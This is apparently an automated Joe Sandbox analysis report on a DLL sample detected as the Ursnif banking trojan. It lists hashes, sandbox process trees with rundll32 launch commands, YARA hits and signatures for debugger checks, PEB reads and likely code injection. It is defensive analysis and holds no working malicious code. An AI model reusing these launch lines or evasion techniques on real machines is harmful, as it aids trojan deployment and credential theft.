Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report c63f1121_by_Libranalysis

Overview

General Information

Sample Name:c63f1121_by_Libranalysis (renamed file extension from none to dll)
Analysis ID:412403
MD5:c63f11211f899e38c1c230594024950a
SHA1:4d5baeaf852156dbe8053a1c600c7d96049f5967
SHA256:70f617d8686bdc7d17d4f3b992a27f2532686815aaf5289841b87fd0c198ff3a
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Ursnif
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6632 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6640 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6664 cmdline: rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6652 cmdline: rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6708 cmdline: rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6724 cmdline: rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: c63f1121_by_Libranalysis.dllVirustotal: Detection: 21%Perma Link
Source: c63f1121_by_Libranalysis.dllReversingLabs: Detection: 10%
Source: c63f1121_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: c63f1121_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\start\populate-Been\early\Cell.pdb source: loaddll32.exe, 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.979819270.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.973298703.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.934749733.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.945802512.000000006D55E000.00000002.00020000.sdmp, c63f1121_by_Libranalysis.dll
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,1_2_6D546773
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5463B7 FindFirstFileExW,1_2_6D5463B7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,3_2_6D546773
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5463B7 FindFirstFileExW,3_2_6D5463B7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,4_2_6D546773
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5463B7 FindFirstFileExW,4_2_6D5463B7

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE

E-Banking Fraud:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D502485 NtQueryVirtualMemory,3_2_6D502485
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D502485 NtQueryVirtualMemory,4_2_6D502485
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53DDE01_2_6D53DDE0
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D553CA01_2_6D553CA0
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D551FD31_2_6D551FD3
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53D96D1_2_6D53D96D
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53E9911_2_6D53E991
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5538701_2_6D553870
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53DB9F1_2_6D53DB9F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5594E31_2_6D5594E3
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D54E4901_2_6D54E490
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53E4B81_2_6D53E4B8
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53E72C1_2_6D53E72C
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5307FD1_2_6D5307FD
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53E0121_2_6D53E012
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5593C31_2_6D5593C3
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D53E2531_2_6D53E253
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5022643_2_6D502264
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53DDE03_2_6D53DDE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5594E33_2_6D5594E3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53E4B83_2_6D53E4B8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53E72C3_2_6D53E72C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5307FD3_2_6D5307FD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D55B94E3_2_6D55B94E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53D96D3_2_6D53D96D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53E9913_2_6D53E991
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53E0123_2_6D53E012
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5533503_2_6D553350
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5593C33_2_6D5593C3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53DB9F3_2_6D53DB9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D53E2533_2_6D53E253
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5022644_2_6D502264
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53DDE04_2_6D53DDE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5594E34_2_6D5594E3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53E4B84_2_6D53E4B8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53E72C4_2_6D53E72C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5307FD4_2_6D5307FD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D55B94E4_2_6D55B94E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53D96D4_2_6D53D96D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53E9914_2_6D53E991
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53E0124_2_6D53E012
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5533504_2_6D553350
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5593C34_2_6D5593C3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53DB9F4_2_6D53DB9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D53E2534_2_6D53E253
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6D548CA9 appears 32 times
Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6D52AEA0 appears 50 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D545A57 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6D52AEA0 appears 82 times
Source: c63f1121_by_Libranalysis.dllBinary or memory string: OriginalFilenameCell.dll8 vs c63f1121_by_Libranalysis.dll
Source: c63f1121_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engineClassification label: mal56.troj.winDLL@11/0@0/0
Source: c63f1121_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4
Source: c63f1121_by_Libranalysis.dllVirustotal: Detection: 21%
Source: c63f1121_by_Libranalysis.dllReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll'
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: c63f1121_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: c63f1121_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\start\populate-Been\early\Cell.pdb source: loaddll32.exe, 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.979819270.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.973298703.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.934749733.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.945802512.000000006D55E000.00000002.00020000.sdmp, c63f1121_by_Libranalysis.dll
Source: c63f1121_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: c63f1121_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: c63f1121_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: c63f1121_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: c63f1121_by_Libranalysis.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D501F31 LoadLibraryA,GetProcAddress,3_2_6D501F31
Source: c63f1121_by_Libranalysis.dllStatic PE information: real checksum: 0x792ff should be: 0x83549
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D504FE6 push ds; iretd 1_2_6D504FF6
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D509EF3 push esp; retf 1_2_6D509EF4
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D50887D push ss; retf 1_2_6D508881
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D50AAC5 push FFFF7185h; iretd 1_2_6D50AACA
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D52A5CF push ecx; ret 1_2_6D52A5E2
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D50532C push edi; iretd 1_2_6D50532D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D502253 push ecx; ret 3_2_6D502263
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D502200 push ecx; ret 3_2_6D502209
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D52A5CF push ecx; ret 3_2_6D52A5E2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D502253 push ecx; ret 4_2_6D502263
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D502200 push ecx; ret 4_2_6D502209
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D52A5CF push ecx; ret 4_2_6D52A5E2

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,1_2_6D546773
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5463B7 FindFirstFileExW,1_2_6D5463B7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,3_2_6D546773
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5463B7 FindFirstFileExW,3_2_6D5463B7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,4_2_6D546773
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5463B7 FindFirstFileExW,4_2_6D5463B7
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D52AC9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D501F31 LoadLibraryA,GetProcAddress,3_2_6D501F31
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545C5F mov eax, dword ptr fs:[00000030h]1_2_6D545C5F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545C1B mov eax, dword ptr fs:[00000030h]1_2_6D545C1B
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545CD4 mov eax, dword ptr fs:[00000030h]1_2_6D545CD4
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545CA3 mov eax, dword ptr fs:[00000030h]1_2_6D545CA3
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545B66 mov eax, dword ptr fs:[00000030h]1_2_6D545B66
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545B0B mov eax, dword ptr fs:[00000030h]1_2_6D545B0B
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545AC8 mov eax, dword ptr fs:[00000030h]1_2_6D545AC8
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D545A85 mov eax, dword ptr fs:[00000030h]1_2_6D545A85
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D537381 mov eax, dword ptr fs:[00000030h]1_2_6D537381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545C5F mov eax, dword ptr fs:[00000030h]3_2_6D545C5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545C1B mov eax, dword ptr fs:[00000030h]3_2_6D545C1B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545CD4 mov eax, dword ptr fs:[00000030h]3_2_6D545CD4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545CA3 mov eax, dword ptr fs:[00000030h]3_2_6D545CA3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545B66 mov eax, dword ptr fs:[00000030h]3_2_6D545B66
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545B0B mov eax, dword ptr fs:[00000030h]3_2_6D545B0B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D537381 mov eax, dword ptr fs:[00000030h]3_2_6D537381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545AC8 mov eax, dword ptr fs:[00000030h]3_2_6D545AC8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D545A85 mov eax, dword ptr fs:[00000030h]3_2_6D545A85
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545C5F mov eax, dword ptr fs:[00000030h]4_2_6D545C5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545C1B mov eax, dword ptr fs:[00000030h]4_2_6D545C1B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545CD4 mov eax, dword ptr fs:[00000030h]4_2_6D545CD4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545CA3 mov eax, dword ptr fs:[00000030h]4_2_6D545CA3
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545B66 mov eax, dword ptr fs:[00000030h]4_2_6D545B66
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545B0B mov eax, dword ptr fs:[00000030h]4_2_6D545B0B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D537381 mov eax, dword ptr fs:[00000030h]4_2_6D537381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545AC8 mov eax, dword ptr fs:[00000030h]4_2_6D545AC8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D545A85 mov eax, dword ptr fs:[00000030h]4_2_6D545A85
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D52AC9F
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5369B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D5369B4
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D52B066 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6D52B066
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D52AC9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D5369B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D5369B4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D52B066 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6D52B066
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6D52AC9F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D5369B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6D5369B4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6D52B066 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6D52B066
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1Jump to behavior
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmpBinary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D52AABF cpuid 1_2_6D52AABF
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,1_2_6D54ED30
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,1_2_6D54EDCB
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,1_2_6D54ECC7
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_6D54EE56
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,1_2_6D548840
Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_6D54EA25
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,1_2_6D548740
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,1_2_6D549163
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_6D54F1CF
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,1_2_6D54F0A9
Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_6D54F3A4
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,1_2_6D54F2D5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6D501566
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D54ED30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D54EDCB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D54ECC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D548740
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6D549163
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6D54F1CF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6D54F3A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6D54EA25
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_6D501566
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6D54ED30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6D54EDCB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6D54ECC7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6D548740
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6D549163
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6D54F1CF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6D54F3A4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6D54EA25
Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6D5491A2 GetSystemTimeAsFileTime,1_2_6D5491A2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D50146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_6D50146C

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

